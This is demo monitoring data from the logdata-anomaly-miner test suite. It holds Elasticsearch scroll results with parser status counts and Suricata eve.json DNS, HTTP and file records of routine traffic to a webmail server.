{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"2zPzLXYBIkOurnXXMIjN","_score":1.0,"_source":{"FromTime":1.607088671024308E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":1723,"/parser/model/php":0,"/parser/model/status_code":9,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:21.062Z","ToTime":1.607088681024395E9,"fromtimestamp":"2020-12-04T13:31:11.024Z","totimestamp":"2020-12-04T13:31:21.024Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"4TPzLXYBIkOurnXXWYgr","_score":1.0,"_source":{"FromTime":1.607088681354751E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":17,"/parser/model/type_str":1715,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:31.396Z","ToTime":1.607088691354804E9,"fromtimestamp":"2020-12-04T13:31:21.354Z","totimestamp":"2020-12-04T13:31:31.354Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"5TPzLXYBIkOurnXXgoi1","_score":1.0,"_source":{"FromTime":1.607088691965782E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":24,"/parser/model/type_str":3070,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:42.030Z","ToTime":1.60708870196585E9,"fromtimestamp":"2020-12-04T13:31:31.965Z","totimestamp":"2020-12-04T13:31:41.965Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"6zPzLXYBIkOurnXXq4gV","_score":1.0,"_source":{"FromTime":1.607088702327717E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":1887,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:52.365Z","ToTime":1.607088712327798E9,"fromtimestamp":"2020-12-04T13:31:42.327Z","totimestamp":"2020-12-04T13:31:52.327Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"7zPzLXYBIkOurnXX0oiK","_score":1.0,"_source":{"FromTime":1.607088712407204E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":323,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:02.467Z","ToTime":1.607088722407292E9,"fromtimestamp":"2020-12-04T13:31:52.407Z","totimestamp":"2020-12-04T13:32:02.407Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"8zPzLXYBIkOurnXX-ogA","_score":1.0,"_source":{"FromTime":1.607088722502143E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":318,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:12.569Z","ToTime":1.607088732502287E9,"fromtimestamp":"2020-12-04T13:32:02.502Z","totimestamp":"2020-12-04T13:32:12.502Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"-DP0LXYBIkOurnXXF4gX","_score":1.0,"_source":{"FromTime":1.607088729964115E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":3,"/parser/model/type_str":2343,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:20.017Z","ToTime":1.607088739964161E9,"fromtimestamp":"2020-12-04T13:32:09.964Z","totimestamp":"2020-12-04T13:32:19.964Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_TP0LXYBIkOurnXXQYjJ","_score":1.0,"_source":{"FromTime":1.607088740904546E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":4933,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:30.946Z","ToTime":1.607088750904612E9,"fromtimestamp":"2020-12-04T13:32:20.904Z","totimestamp":"2020-12-04T13:32:30.904Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_zP0LXYBIkOurnXXSYi3","_score":1.0,"_source":{"FromTime":1.607088742920283E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:32.977Z","ToTime":1.607088752920326E9,"fromtimestamp":"2020-12-04T13:32:22.920Z","totimestamp":"2020-12-04T13:32:32.920Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"AzP0LXYBIkOurnXXcYlB","_score":1.0,"_source":{"FromTime":1.60708875305248E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":6,"/parser/model/type_str":517,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:43.098Z","ToTime":1.607088763052544E9,"fromtimestamp":"2020-12-04T13:32:33.052Z","totimestamp":"2020-12-04T13:32:43.052Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"CTP0LXYBIkOurnXXmYl8","_score":1.0,"_source":{"FromTime":1.607088763350645E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":36,"/parser/model/type_str":1221,"/parser/model/php":0,"/parser/model/status_code":17,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:53.397Z","ToTime":1.607088773350717E9,"fromtimestamp":"2020-12-04T13:32:43.350Z","totimestamp":"2020-12-04T13:32:53.350Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"DTP0LXYBIkOurnXXwIn-","_score":1.0,"_source":{"FromTime":1.607088773468664E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":461,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:03.511Z","ToTime":1.607088783468755E9,"fromtimestamp":"2020-12-04T13:32:53.468Z","totimestamp":"2020-12-04T13:33:03.468Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"EjP0LXYBIkOurnXX6ok5","_score":1.0,"_source":{"FromTime":1.607088784026072E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":2426,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:14.066Z","ToTime":1.607088794026145E9,"fromtimestamp":"2020-12-04T13:33:04.026Z","totimestamp":"2020-12-04T13:33:14.026Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"GDP1LXYBIkOurnXXEYmz","_score":1.0,"_source":{"FromTime":1.607088794130318E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":8,"/parser/model/type_str":401,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:24.172Z","ToTime":1.60708880413046E9,"fromtimestamp":"2020-12-04T13:33:14.130Z","totimestamp":"2020-12-04T13:33:24.130Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"HDP1LXYBIkOurnXXOYks","_score":1.0,"_source":{"FromTime":1.607088804238838E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":6,"/parser/model/type_str":419,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:34.277Z","ToTime":1.607088814238905E9,"fromtimestamp":"2020-12-04T13:33:24.238Z","totimestamp":"2020-12-04T13:33:34.238Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ITP1LXYBIkOurnXXYIlW","_score":1.0,"_source":{"FromTime":1.607088814261893E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:44.303Z","ToTime":1.607088824261959E9,"fromtimestamp":"2020-12-04T13:33:34.261Z","totimestamp":"2020-12-04T13:33:44.261Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"JjP1LXYBIkOurnXXh4l_","_score":1.0,"_source":{"FromTime":1.607088824290643E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":5347,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:54.328Z","ToTime":1.607088834290724E9,"fromtimestamp":"2020-12-04T13:33:44.290Z","totimestamp":"2020-12-04T13:33:54.290Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"KzP1LXYBIkOurnXXsImn","_score":1.0,"_source":{"FromTime":1.607088834826981E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":46,"/parser/model/type_str":2788,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:04.864Z","ToTime":1.60708884482705E9,"fromtimestamp":"2020-12-04T13:33:54.826Z","totimestamp":"2020-12-04T13:34:04.827Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"LzP1LXYBIkOurnXX2Ik0","_score":1.0,"_source":{"FromTime":1.607088844951758E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":538,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:14.989Z","ToTime":1.607088854951834E9,"fromtimestamp":"2020-12-04T13:34:04.951Z","totimestamp":"2020-12-04T13:34:14.951Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"NTP1LXYBIkOurnXX_4nQ","_score":1.0,"_source":{"FromTime":1.607088855090159E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":653,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:25.129Z","ToTime":1.607088865090244E9,"fromtimestamp":"2020-12-04T13:34:15.090Z","totimestamp":"2020-12-04T13:34:25.090Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"OjP2LXYBIkOurnXXJ4lZ","_score":1.0,"_source":{"FromTime":1.607088865212616E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":502,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:35.250Z","ToTime":1.607088875212694E9,"fromtimestamp":"2020-12-04T13:34:25.212Z","totimestamp":"2020-12-04T13:34:35.212Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"PjP2LXYBIkOurnXXT4n4","_score":1.0,"_source":{"FromTime":1.607088875611484E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":2205,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:45.649Z","ToTime":1.607088885611568E9,"fromtimestamp":"2020-12-04T13:34:35.611Z","totimestamp":"2020-12-04T13:34:45.611Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"RDP2LXYBIkOurnXXeIkn","_score":1.0,"_source":{"FromTime":1.607088885898558E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":1542,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:55.936Z","ToTime":1.607088895898649E9,"fromtimestamp":"2020-12-04T13:34:45.898Z","totimestamp":"2020-12-04T13:34:55.898Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"SDP2LXYBIkOurnXXoYl8","_score":1.0,"_source":{"FromTime":1.607088896465222E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":13,"/parser/model/type_str":3152,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:35:06.517Z","ToTime":1.607088906465292E9,"fromtimestamp":"2020-12-04T13:34:56.465Z","totimestamp":"2020-12-04T13:35:06.465Z","version":"1"}}]}} logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/eve.json000066400000000000000000077225771500476301700313610ustar00rootroot00000000000000{"timestamp":"2020-02-29T00:00:01.041456+0000","flow_id":387009461891405,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46406,"proto":"UDP","dns":{"type":"answer","id":22103,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:01.041456+0000","flow_id":387009461891405,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46406,"proto":"UDP","dns":{"type":"answer","id":22103,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:01.126898+0000","flow_id":1265931569107445,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4768}} {"timestamp":"2020-02-29T00:00:02.592153+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35290,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31668,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:02.626782+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":16}} {"timestamp":"2020-02-29T00:00:02.697211+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35290,"proto":"UDP","dns":{"type":"answer","id":31668,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:02.697211+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35290,"proto":"UDP","dns":{"type":"answer","id":31668,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:00:02.763084+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":17}} {"timestamp":"2020-02-29T00:00:02.774030+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383}} {"timestamp":"2020-02-29T00:00:02.953009+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":17}} 
